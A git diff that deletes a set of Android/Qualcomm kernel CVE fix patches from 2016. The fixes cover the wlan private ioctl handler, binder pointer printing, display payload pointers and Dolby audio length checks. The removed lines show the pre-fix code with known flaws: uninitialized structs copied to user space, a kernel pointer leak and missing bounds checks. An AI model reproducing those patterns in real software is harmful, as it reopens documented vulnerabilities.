--           VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                     "%s: Error in iw_set_scan!", __func__);
--          rc = -EINVAL;
--       }
--    }
--    else if( strcasecmp(cmd, "start") == 0 ) {
--
--        hddLog(VOS_TRACE_LEVEL_INFO_HIGH, "Start command");
--        /*Exit from Deep sleep or standby if we get the driver START cmd from android GUI*/
--
--        vos_status = wlan_hdd_exit_lowpower(pHddCtx, pAdapter);
--        if (vos_status == VOS_STATUS_SUCCESS)
--        {
--            union iwreq_data wrqu;
--            char buf[10];
--
--            memset(&wrqu, 0, sizeof(wrqu));
--            wrqu.data.length = strlcpy(buf, "START", sizeof(buf));
--            wireless_send_event(pAdapter->dev, IWEVCUSTOM, &wrqu, buf);
--        }
--        else
--        {
--            hddLog(VOS_TRACE_LEVEL_ERROR, "%s: START CMD Status %d", __func__, vos_status);
--            rc = -EIO;
--        }
--        goto done;
--    }
--    else if( strcasecmp(cmd, "stop") == 0 )
--    {
--        union iwreq_data wrqu;
--        char buf[10];
--
--        hddLog(VOS_TRACE_LEVEL_INFO_HIGH, "Stop command");
--
--        wlan_hdd_enter_lowpower(pHddCtx);
--        memset(&wrqu, 0, sizeof(wrqu));
--        wrqu.data.length = strlcpy(buf, "STOP", sizeof(buf));
--        wireless_send_event(pAdapter->dev, IWEVCUSTOM, &wrqu, buf);
--        goto done;
--    }
--    else if (strcasecmp(cmd, "macaddr") == 0)
--    {
--        ret = snprintf(cmd, cmd_len, "Macaddr = " MAC_ADDRESS_STR,
--                       MAC_ADDR_ARRAY(pAdapter->macAddressCurrent.bytes));
--    }
--    else if (strcasecmp(cmd, "scan-active") == 0)
--    {
--        hdd_context_t *pHddCtx = WLAN_HDD_GET_CTX(pAdapter);
--        hddLog(LOG1, FL("making default scan to active"));
--        pHddCtx->ioctl_scan_mode = eSIR_ACTIVE_SCAN;
--        ret = snprintf(cmd, cmd_len, "OK");
--    }
--    else if (strcasecmp(cmd, "scan-passive") == 0)
--    {
--        hdd_context_t *pHddCtx = WLAN_HDD_GET_CTX(pAdapter);
--        hddLog(LOG1, FL("making default scan to active"));
--        pHddCtx->ioctl_scan_mode = eSIR_PASSIVE_SCAN;
--        ret = snprintf(cmd, cmd_len, "OK");
--    }
--    else if( strcasecmp(cmd, "scan-mode") == 0 )
--    {
--        ret = snprintf(cmd, cmd_len, "ScanMode = %u", pAdapter->scan_info.scan_mode);
--    }
--    else if( strcasecmp(cmd, "linkspeed") == 0 )
--    {
--        ret = iw_get_linkspeed(dev, info, wrqu, cmd);
--    }
--    else if( strncasecmp(cmd, "COUNTRY", 7) == 0 ) {
--        char *country_code;
--        unsigned long rc;
--        eHalStatus eHal_status;
--
--        country_code =  cmd + 8;
--
--        init_completion(&pAdapter->change_country_code);
--
--        eHal_status = sme_ChangeCountryCode(pHddCtx->hHal,
--                                            (void *)(tSmeChangeCountryCallback)wlan_hdd_change_country_code_callback,
--                                            country_code,
--                                            pAdapter,
--                                            pHddCtx->pvosContext,
--                                            eSIR_TRUE,
--                                            eSIR_TRUE);
--
--        /* Wait for completion */
--        rc = wait_for_completion_timeout(&pAdapter->change_country_code,
--                                  msecs_to_jiffies(WLAN_WAIT_TIME_STATS));
--
--        if (!rc) {
--            hddLog(VOS_TRACE_LEVEL_ERROR,
--               FL("SME timedout while setting country code"));
--        }
--
--        if (eHAL_STATUS_SUCCESS != eHal_status)
--        {
--            VOS_TRACE( VOS_MODULE_ID_VOSS, VOS_TRACE_LEVEL_ERROR,
--                       "%s: SME Change Country code fail", __func__);
--            vos_mem_free(cmd);
--            return -EIO;
--        }
--    }
--    else if( strncasecmp(cmd, "rssi", 4) == 0 )
--    {
--        ret = iw_get_rssi(dev, info, wrqu, cmd);
--    }
--    else if( strncasecmp(cmd, "powermode", 9) == 0 ) {
--        int mode;
--        char *ptr;
--
--        if (9 < cmd_len)
--        {
--            ptr = (char*)(cmd + 9);
--
--        }else{
--              VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                        "CMD LENGTH %d is not correct",cmd_len);
--              vos_mem_free(cmd);
--              return -EINVAL;
--        }
--
--        if (1 != sscanf(ptr,"%d",&mode))
--        {
--            VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                      "powermode input %s is not correct",ptr);
--            vos_mem_free(cmd);
--            return -EIO;
--        }
--
--        if(!pHddCtx->cfg_ini->enablePowersaveOffload)
--            wlan_hdd_enter_bmps(pAdapter, mode);
--        else
--            wlan_hdd_set_powersave(pAdapter, mode);
--    }
--    else if (strncasecmp(cmd, "getpower", 8) == 0 ) {
--        v_U32_t pmc_state;
--        v_U16_t value;
--
--        pmc_state = pmcGetPmcState(WLAN_HDD_GET_HAL_CTX(pAdapter));
--        if(pmc_state == BMPS) {
--           value = DRIVER_POWER_MODE_AUTO;
--        }
--        else {
--           value = DRIVER_POWER_MODE_ACTIVE;
--        }
--        ret = snprintf(cmd, cmd_len, "powermode = %u", value);
--    }
--    else if( strncasecmp(cmd, "btcoexmode", 10) == 0 ) {
--        hddLog( VOS_TRACE_LEVEL_INFO, "btcoexmode");
--        /*TODO: set the btcoexmode*/
--    }
--    else if( strcasecmp(cmd, "btcoexstat") == 0 ) {
--
--        hddLog(VOS_TRACE_LEVEL_INFO, "BtCoex Status");
--        /*TODO: Return the btcoex status*/
--    }
--    else if( strcasecmp(cmd, "rxfilter-start") == 0 ) {
--
--        hddLog(VOS_TRACE_LEVEL_INFO, "Rx Data Filter Start command");
--
--        /*TODO: Enable Rx data Filter*/
--    }
--    else if( strcasecmp(cmd, "rxfilter-stop") == 0 ) {
--
--        hddLog(VOS_TRACE_LEVEL_INFO, "Rx Data Filter Stop command");
--
--        /*TODO: Disable Rx data Filter*/
--    }
--    else if( strcasecmp(cmd, "rxfilter-statistics") == 0 ) {
--
--        hddLog( VOS_TRACE_LEVEL_INFO, "Rx Data Filter Statistics command");
--        /*TODO: rxfilter-statistics*/
--    }
--    else if( strncasecmp(cmd, "rxfilter-add", 12) == 0 ) {
--
--        hddLog( VOS_TRACE_LEVEL_INFO, "rxfilter-add");
--        /*TODO: rxfilter-add*/
--    }
--    else if( strncasecmp(cmd, "rxfilter-remove",15) == 0 ) {
--
--        hddLog( VOS_TRACE_LEVEL_INFO, "rxfilter-remove");
--        /*TODO: rxfilter-remove*/
--    }
--#ifdef FEATURE_WLAN_SCAN_PNO
--    else if( strncasecmp(cmd, "pnosetup", 8) == 0 ) {
--        hddLog( VOS_TRACE_LEVEL_INFO, "pnosetup");
--        /*TODO: support pnosetup*/
--    }
--    else if( strncasecmp(cmd, "pnoforce", 8) == 0 ) {
--        hddLog( VOS_TRACE_LEVEL_INFO, "pnoforce");
--        /*TODO: support pnoforce*/
--    }
--    else if( strncasecmp(cmd, "pno",3) == 0 ) {
--
--        hddLog( VOS_TRACE_LEVEL_INFO, "pno");
--        ret = iw_set_pno(dev, info, wrqu, cmd, 3);
--        vos_mem_free(cmd);
--        return ret;
--    }
--#endif /*FEATURE_WLAN_SCAN_PNO*/
--    else if( strncasecmp(cmd, "powerparams",11) == 0 ) {
--      hddLog( VOS_TRACE_LEVEL_INFO, "powerparams");
--      vos_status = iw_set_power_params(dev, info, wrqu, cmd, 11);
--      vos_mem_free(cmd);
--      return (vos_status == VOS_STATUS_SUCCESS) ? 0 : -EINVAL;
--    }
--    else if( 0 == strncasecmp(cmd, "CONFIG-TX-TRACKING", 18) ) {
--        tSirTxPerTrackingParam tTxPerTrackingParam;
--        char *ptr;
--
--        if (18 < cmd_len)
--        {
--           ptr = (char*)(cmd + 18);
--        }else{
--               VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                         "CMD LENGTH %d is not correct",cmd_len);
--               vos_mem_free(cmd);
--               return -EINVAL;
--        }
--
--        if (4 != sscanf(ptr,"%hhu %hhu %hhu %u",
--                        &(tTxPerTrackingParam.ucTxPerTrackingEnable),
--                        &(tTxPerTrackingParam.ucTxPerTrackingPeriod),
--                        &(tTxPerTrackingParam.ucTxPerTrackingRatio),
--                        &(tTxPerTrackingParam.uTxPerTrackingWatermark)))
--        {
--            VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                      "CONFIG-TX-TRACKING %s input is not correct",ptr);
--                      vos_mem_free(cmd);
--                      return -EIO;
--        }
--
--        // parameters checking
--        // period has to be larger than 0
--        if (0 == tTxPerTrackingParam.ucTxPerTrackingPeriod)
--        {
--            VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_WARN, "Period input is not correct");
--            vos_mem_free(cmd);
--            return -EIO;
--        }
--
--        // use default value 5 is the input is not reasonable. in unit of 10%
--        if ((tTxPerTrackingParam.ucTxPerTrackingRatio > TX_PER_TRACKING_MAX_RATIO) || (0 == tTxPerTrackingParam.ucTxPerTrackingRatio))
--        {
--            VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_WARN, "Ratio input is not good. use default 5");
--            tTxPerTrackingParam.ucTxPerTrackingRatio = TX_PER_TRACKING_DEFAULT_RATIO;
--        }
--
--        // default is 5
--        if (0 == tTxPerTrackingParam.uTxPerTrackingWatermark)
--        {
--            VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_WARN, "Tx Packet number input is not good. use default 5");
--            tTxPerTrackingParam.uTxPerTrackingWatermark = TX_PER_TRACKING_DEFAULT_WATERMARK;
--        }
--
--        if (eHAL_STATUS_SUCCESS !=
--            sme_SetTxPerTracking(pHddCtx->hHal,
--                                 hdd_tx_per_hit_cb,
--                                 (void*)pAdapter, &tTxPerTrackingParam)) {
--           VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_WARN, "Set Tx PER Tracking Failed!");
--            rc = -EIO;
--        }
--    }
--    else {
--        hddLog( VOS_TRACE_LEVEL_WARN, "%s: Unsupported GUI command %s",
--                __func__, cmd);
--    }
--done:
--    /* many of the commands write information back into the command
--       string using snprintf().  check the return value here in one
--       place */
--    if ((ret < 0) || (ret >= cmd_len))
--    {
--       /* there was an encoding error or overflow */
--       rc = -EINVAL;
--    }
--    else if (ret > 0)
--    {
--       if (copy_to_user(wrqu->data.pointer, cmd, ret))
--       {
--          hddLog(VOS_TRACE_LEVEL_ERROR,
--                 "%s: failed to copy data to user buffer", __func__);
--          vos_mem_free(cmd);
--          return -EFAULT;
--       }
--       wrqu->data.length = ret;
--    }
--
--    if (ioctl_debug)
--    {
--       pr_info("%s: rsp [%s] len [%d] status %d\n",
--               __func__, cmd, wrqu->data.length, rc);
--    }
--    vos_mem_free(cmd);
--    return rc;
--}
--
--/**
-- * iw_set_priv() - SSR wrapper for __iw_set_priv()
-- * @dev: pointer to net_device
-- * @info: pointer to iw_request_info
-- * @wrqu: pointer to iwreq_data
-- * @extra: pointer to extra ioctl payload
-- *
-- * Return: 0 on success, error number otherwise
-- */
--static int iw_set_priv(struct net_device *dev, struct iw_request_info *info,
--		       union iwreq_data *wrqu, char *extra)
--{
--	int ret;
--
--	vos_ssr_protect(__func__);
--	ret = __iw_set_priv(dev, info, wrqu, extra);
--	vos_ssr_unprotect(__func__);
--
--	return ret;
--}
--
--/**
-  * __iw_set_nick() - set nick
-  * @dev: pointer to net_device
-  * @info: pointer to iw_request_info
-@@ -11418,7 +10984,7 @@ static const iw_handler      we_handler[] =
-    (iw_handler) NULL,              /* SIOCGIWSENS */
-    (iw_handler) NULL,             /* SIOCSIWRANGE */
-    (iw_handler) iw_get_range,      /* SIOCGIWRANGE */
--   (iw_handler) iw_set_priv,       /* SIOCSIWPRIV */
-+   (iw_handler) NULL,             /* SIOCSIWPRIV */
-    (iw_handler) NULL,             /* SIOCGIWPRIV */
-    (iw_handler) NULL,             /* SIOCSIWSTATS */
-    (iw_handler) NULL,             /* SIOCGIWSTATS */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6681/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6681/ANY/0001.patch
deleted file mode 100644
index 5ee20560..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6681/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 0950fbd39ff189497f1b6115825c210e3eeaf395 Mon Sep 17 00:00:00 2001
-From: Haynes Mathew George <hgeorge@codeaurora.org>
-Date: Wed, 3 Aug 2016 11:55:07 -0700
-Subject: misc: qcom: qdsp6v2: Add missing initialization
-
-Use variables in driver context after proper initialization
-
-CRs-Fixed: 1049521, 1049615
-Change-Id: I3e59e27534b8e1088d74b42c72e0075d2fe910e6
-Signed-off-by: Haynes Mathew George <hgeorge@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/audio_utils.c     | 3 ++-
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 1 +
- 2 files changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils.c b/drivers/misc/qcom/qdsp6v2/audio_utils.c
-index cad0220..cec449d 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -588,6 +588,7 @@ long audio_in_compat_ioctl(struct file *file,
- 	}
- 	case AUDIO_GET_CONFIG_32: {
- 		struct msm_audio_config32 cfg_32;
-+		memset(&cfg_32, 0, sizeof(cfg_32));
- 		cfg_32.buffer_size = audio->pcm_cfg.buffer_size;
- 		cfg_32.buffer_count = audio->pcm_cfg.buffer_count;
- 		cfg_32.channel_count = audio->pcm_cfg.channel_count;
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index b87b208..b48aff3 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -1935,6 +1935,7 @@ static long audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- 	case AUDIO_GET_CONFIG_32: {
- 		struct msm_audio_config32 cfg_32;
- 		mutex_lock(&audio->lock);
-+		memset(&cfg_32, 0, sizeof(cfg_32));
- 		cfg_32.buffer_size = audio->pcm_cfg.buffer_size;
- 		cfg_32.buffer_count = audio->pcm_cfg.buffer_count;
- 		cfg_32.channel_count = audio->pcm_cfg.channel_count;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6682/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6682/ANY/0001.patch
deleted file mode 100644
index 5ee20560..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6682/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 0950fbd39ff189497f1b6115825c210e3eeaf395 Mon Sep 17 00:00:00 2001
-From: Haynes Mathew George <hgeorge@codeaurora.org>
-Date: Wed, 3 Aug 2016 11:55:07 -0700
-Subject: misc: qcom: qdsp6v2: Add missing initialization
-
-Use variables in driver context after proper initialization
-
-CRs-Fixed: 1049521, 1049615
-Change-Id: I3e59e27534b8e1088d74b42c72e0075d2fe910e6
-Signed-off-by: Haynes Mathew George <hgeorge@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/audio_utils.c     | 3 ++-
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 1 +
- 2 files changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils.c b/drivers/misc/qcom/qdsp6v2/audio_utils.c
-index cad0220..cec449d 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -588,6 +588,7 @@ long audio_in_compat_ioctl(struct file *file,
- 	}
- 	case AUDIO_GET_CONFIG_32: {
- 		struct msm_audio_config32 cfg_32;
-+		memset(&cfg_32, 0, sizeof(cfg_32));
- 		cfg_32.buffer_size = audio->pcm_cfg.buffer_size;
- 		cfg_32.buffer_count = audio->pcm_cfg.buffer_count;
- 		cfg_32.channel_count = audio->pcm_cfg.channel_count;
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index b87b208..b48aff3 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -1935,6 +1935,7 @@ static long audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- 	case AUDIO_GET_CONFIG_32: {
- 		struct msm_audio_config32 cfg_32;
- 		mutex_lock(&audio->lock);
-+		memset(&cfg_32, 0, sizeof(cfg_32));
- 		cfg_32.buffer_size = audio->pcm_cfg.buffer_size;
- 		cfg_32.buffer_count = audio->pcm_cfg.buffer_count;
- 		cfg_32.channel_count = audio->pcm_cfg.channel_count;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6683/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6683/ANY/0001.patch
deleted file mode 100644
index 44578d0f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6683/ANY/0001.patch
+++ /dev/null
@@ -1,13 +0,0 @@
-diff --git a/drivers/android/binder.c b/drivers/android/binder.c
-index 8837330..b2f704b 100644
---- a/drivers/android/binder.c
-+++ b/drivers/android/binder.c
-@@ -3454,7 +3454,7 @@
- 
- static void print_binder_ref(struct seq_file *m, struct binder_ref *ref)
- {
--	seq_printf(m, "  ref %d: desc %d %snode %d s %d w %d d %p\n",
-+	seq_printf(m, "  ref %d: desc %d %snode %d s %d w %d d %pK\n",
- 		   ref->debug_id, ref->desc, ref->node->proc ? "" : "dead ",
- 		   ref->node->debug_id, ref->strong, ref->weak, ref->death);
- }
diff --git a/Patches/Linux_CVEs/CVE-2016-6683/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-6683/ANY/0001.patch.base64
deleted file mode 100644
index 918480c5..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6683/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2RyaXZlcnMvYW5kcm9pZC9iaW5kZXIuYyBiL2RyaXZlcnMvYW5kcm9pZC9iaW5kZXIuYwppbmRleCA4ODM3MzMwLi5iMmY3MDRiIDEwMDY0NAotLS0gYS9kcml2ZXJzL2FuZHJvaWQvYmluZGVyLmMKKysrIGIvZHJpdmVycy9hbmRyb2lkL2JpbmRlci5jCkBAIC0zNDU0LDcgKzM0NTQsNyBAQAogCiBzdGF0aWMgdm9pZCBwcmludF9iaW5kZXJfcmVmKHN0cnVjdCBzZXFfZmlsZSAqbSwgc3RydWN0IGJpbmRlcl9yZWYgKnJlZikKIHsKLQlzZXFfcHJpbnRmKG0sICIgIHJlZiAlZDogZGVzYyAlZCAlc25vZGUgJWQgcyAlZCB3ICVkIGQgJXBcbiIsCisJc2VxX3ByaW50ZihtLCAiICByZWYgJWQ6IGRlc2MgJWQgJXNub2RlICVkIHMgJWQgdyAlZCBkICVwS1xuIiwKIAkJICAgcmVmLT5kZWJ1Z19pZCwgcmVmLT5kZXNjLCByZWYtPm5vZGUtPnByb2MgPyAiIiA6ICJkZWFkICIsCiAJCSAgIHJlZi0+bm9kZS0+ZGVidWdfaWQsIHJlZi0+c3Ryb25nLCByZWYtPndlYWssIHJlZi0+ZGVhdGgpOwogfQo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-6692/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6692/ANY/0001.patch
deleted file mode 100644
index c863936e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6692/ANY/0001.patch
+++ /dev/null
@@ -1,58 +0,0 @@
-From 0f0e7047d39f9fb3a1a7f389918ff79cdb4a50b3 Mon Sep 17 00:00:00 2001
-From: Ping Li <pingli@codeaurora.org>
-Date: Tue, 19 Apr 2016 18:52:10 -0700
-Subject: msm: mdss: Properly set the PP feature cfg_payload in layers
-
-Set the PP feature cfg_payload properly to avoid invalid pointer
-cases.
-
-CRs-Fixed: 1004933
-Change-Id: I44314b49a6ebb5dedfdedfcddd88c12eabd1f125
-Signed-off-by: Ping Li <pingli@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_mdp_pp.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pp.c b/drivers/video/msm/mdss/mdss_mdp_pp.c
-index 06ba5b1..0ed13ed0 100644
---- a/drivers/video/msm/mdss/mdss_mdp_pp.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pp.c
-@@ -7162,6 +7162,8 @@ int mdss_mdp_copy_layer_pp_info(struct mdp_input_layer *layer)
- 			pr_err("Failed to copy IGC payload, ret = %d\n", ret);
- 			goto exit_pp_info;
- 		}
-+	} else {
-+		pp_info->igc_cfg.cfg_payload = NULL;
- 	}
- 	if (ops & MDP_OVERLAY_PP_HIST_LUT_CFG) {
- 		ret = pp_copy_layer_hist_lut_payload(pp_info);
-@@ -7170,6 +7172,8 @@ int mdss_mdp_copy_layer_pp_info(struct mdp_input_layer *layer)
- 				ret);
- 			goto exit_igc;
- 		}
-+	} else {
-+		pp_info->hist_lut_cfg.cfg_payload = NULL;
- 	}
- 	if (ops & MDP_OVERLAY_PP_PA_V2_CFG) {
- 		ret = pp_copy_layer_pa_payload(pp_info);
-@@ -7177,6 +7181,8 @@ int mdss_mdp_copy_layer_pp_info(struct mdp_input_layer *layer)
- 			pr_err("Failed to copy PA payload, ret = %d\n", ret);
- 			goto exit_hist_lut;
- 		}
-+	} else {
-+		pp_info->pa_v2_cfg_data.cfg_payload = NULL;
- 	}
- 	if (ops & MDP_OVERLAY_PP_PCC_CFG) {
- 		ret = pp_copy_layer_pcc_payload(pp_info);
-@@ -7184,6 +7190,8 @@ int mdss_mdp_copy_layer_pp_info(struct mdp_input_layer *layer)
- 			pr_err("Failed to copy PCC payload, ret = %d\n", ret);
- 			goto exit_pa;
- 		}
-+	} else {
-+		pp_info->pcc_cfg_data.cfg_payload = NULL;
- 	}
- 
- 	layer->pp_info = pp_info;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6693/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6693/ANY/0001.patch
deleted file mode 100644
index 865d8d71..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6693/ANY/0001.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From ac328eb631fa74a63d5d2583e6bfeeb5a7a2df65 Mon Sep 17 00:00:00 2001
-From: Ashish Jain <ashishj@codeaurora.org>
-Date: Mon, 20 Jun 2016 18:09:07 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate data length
-
-Validate input data length to ensure only relevant data
-is copied.
-
-CRs-Fixed: 1027585
-Change-Id: I67eb4f162f944bbf4d9e55fb8fe93759e6b8ff91
-Signed-off-by: Ashish Jain <ashishj@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index fea7bb4..379062e 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1522,6 +1522,14 @@ static int msm_ds2_dap_get_param(u32 cmd, void *arg)
- 		goto end;
- 	}
- 
-+	/* Return if invalid length */
-+	if (dolby_data->length >
-+	       (DOLBY_MAX_LENGTH_INDIVIDUAL_PARAM - DOLBY_PARAM_PAYLOAD_SIZE)) {
-+		pr_err("Invalid length %d", dolby_data->length);
-+		rc = -EINVAL;
-+		goto end;
-+	}
-+
- 	for (i = 0; i < DS2_DEVICES_ALL; i++) {
- 		if ((dev_map[i].active) &&
- 			(dev_map[i].device_id & dolby_data->device_id)) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6694/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6694/ANY/0001.patch
deleted file mode 100644
index 8379f2a8..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6694/ANY/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 961e38553aae8ba9b1af77c7a49acfbb7b0b6f62 Mon Sep 17 00:00:00 2001
-From: Ashish Jain <ashishj@codeaurora.org>
-Date: Thu, 30 Jun 2016 18:28:37 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Allocate param buffer with correct size
-
-Size of param buffer should be big enough to hold param length
-of data and param payload.
-
-CRs-Fixed: 1033525
-Change-Id: I6fa58f87a7c7df5f0485ea5b368ea090eb8bedb4
-Signed-off-by: Ashish Jain <ashishj@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 9 +++++----
- 1 file changed, 5 insertions(+), 4 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index 379062e..7bd6ee8 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1554,7 +1554,8 @@ static int msm_ds2_dap_get_param(u32 cmd, void *arg)
- 	pr_debug("%s: port_id 0x%x, copp_idx %d, dev_map[i].device_id %x\n",
- 		 __func__, port_id, copp_idx, dev_map[i].device_id);
- 
--	params_value = kzalloc(params_length, GFP_KERNEL);
-+	params_value = kzalloc(params_length + param_payload_len,
-+				GFP_KERNEL);
- 	if (!params_value) {
- 		pr_err("%s: params memory alloc failed\n", __func__);
- 		rc = -ENOMEM;
-@@ -1578,9 +1579,9 @@ static int msm_ds2_dap_get_param(u32 cmd, void *arg)
- 			rc = -EINVAL;
- 			goto end;
- 		} else {
--			params_length = (ds2_dap_params_length[i] +
--						DOLBY_PARAM_PAYLOAD_SIZE) *
--						sizeof(uint32_t);
-+			params_length =
-+			ds2_dap_params_length[i] * sizeof(uint32_t);
-+
- 			rc = adm_get_params(port_id, copp_idx,
- 					    DOLBY_BUNDLE_MODULE_ID,
- 					    ds2_dap_params_id[i],
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6695/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6695/ANY/0001.patch
deleted file mode 100644
index 9b67d853..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6695/ANY/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From c319c2b0926d1ea5edb4d0778d88bd3ce37c4b95 Mon Sep 17 00:00:00 2001
-From: Ashish Jain <ashishj@codeaurora.org>
-Date: Fri, 1 Jul 2016 12:31:21 +0530
-Subject: ASoC: msm: qdsp6v2: DAP: Add check to validate param length
-
-To avoid buffer overflow, validate input length used to
-fetch visualizer data.
-
-CRs-Fixed: 1033540
-Change-Id: I445d1ba3bce47308bc31ae24a70d5ee358f22a2d
-Signed-off-by: Ashish Jain <ashishj@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-dolby-common.h   | 3 ++-
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c | 7 +++++++
- 2 files changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-dolby-common.h b/sound/soc/msm/qdsp6v2/msm-dolby-common.h
-index aab6dc8..f14e42e 100644
---- a/sound/soc/msm/qdsp6v2/msm-dolby-common.h
-+++ b/sound/soc/msm/qdsp6v2/msm-dolby-common.h
-@@ -1,5 +1,5 @@
- 
--/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2014, 2016 The Linux Foundation. All rights reserved.
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-  * only version 2 as published by the Free Software Foundation.
-@@ -232,6 +232,7 @@
- 
- #define TOTAL_LENGTH_DOLBY_PARAM		745
- #define DOLBY_VIS_PARAM_HEADER_SIZE		25
-+#define DOLBY_PARAM_VCNB_MAX_LENGTH		40
- 
- #define DOLBY_INVALID_PORT_ID			-1
- 
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index 379062e..86290aa 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1635,6 +1635,13 @@ static int msm_ds2_dap_param_visualizer_control_get(u32 cmd, void *arg)
- 	}
- 
- 	length = ds2_dap_params[cache_dev].params_val[DOLBY_PARAM_VCNB_OFFSET];
-+
-+	if (length > DOLBY_PARAM_VCNB_MAX_LENGTH || length <= 0) {
-+		ret = 0;
-+		dolby_data->length = 0;
-+		pr_err("%s Incorrect VCNB length", __func__);
-+	}
-+
- 	params_length = (2*length + DOLBY_VIS_PARAM_HEADER_SIZE) *
- 							 sizeof(uint32_t);
- 
--- 
-cgit v1.1
-
